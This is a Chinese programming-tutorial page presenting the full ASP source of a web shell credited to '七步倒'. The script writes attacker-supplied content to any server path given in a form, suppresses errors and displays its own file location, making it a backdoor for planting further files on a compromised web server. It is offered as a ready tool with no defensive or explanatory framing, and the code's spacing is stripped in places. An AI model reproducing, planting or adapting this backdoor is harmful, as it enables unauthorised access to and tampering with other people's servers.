手机
当前位置:查字典教程网 >编程开发 >ASP教程 >七步倒┈→专用asp后门
七步倒┈→专用asp后门
摘要:七步倒┈→专用asp后门BY:七步倒

<html>

<head>

<title>七步倒┈→专用asp后门</title>

</head>

</html>

<%dimobjFSO%>

<%dimfdata%>

<%dimobjCountFile%>

<%onerrorresumenext%>

<%SetobjFSO=Server.CreateObject("Scripting.FileSystemObject")%>

<%ifTrim(request("syfdpath"))<>""then%>

<%fdata=request("cyfddata")%>

<%SetobjCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%>

<%objCountFile.Writefdata%>

<%iferr=0then%>

<%response.write"<fontcolor=blue>SaveSuccess!</font>"%>

<%else%>

<%response.write"<fontcolor=red>SaveUnSuccess!</font>"%>

<%endif%>

<%err.clear%>

<%endif%>

<%objCountFile.Close%>

<%SetobjCountFile=Nothing%>

<%SetobjFSO=Nothing%>

<%Response.write"<formaction=''''method=post>"%>

<%Response.write"<fontcolor=blue>savefile绝对路径:</font>"%>

<%Response.Write"<inputtype=textname=syfdpathwidth=32size=50>"%>

<%Response.Write"<br>"%>

<%Response.write"<fontcolor=red>fileof绝对路径"%>

<%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%>

<%Response.write"<br>"%>

<%Response.write"input:"%>

<%Response.write"<textareaname=cyfddatacols=80rows=10

width=50></textarea>"%>

<%Response.write"<inputtype=submitvalue=save>"%>

<%Response.write"</form>"%>

BY:七步倒

【七步倒┈→专用asp后门】相关文章:

用FSO获得图片文件的信息(大小,宽,高)

ASP中一个用VBScript写的随机数类

ASP+Access的安全隐患及对策

ASP万用分页程序

ASP中常用的变量命名规则

ASP数据岛操作类

ASP生成动态flash的工具与介绍

创建一个ASP通用分页类

MSXML4.0 版中的新增功能

VBScript中变量作用域

精品推荐
分类导航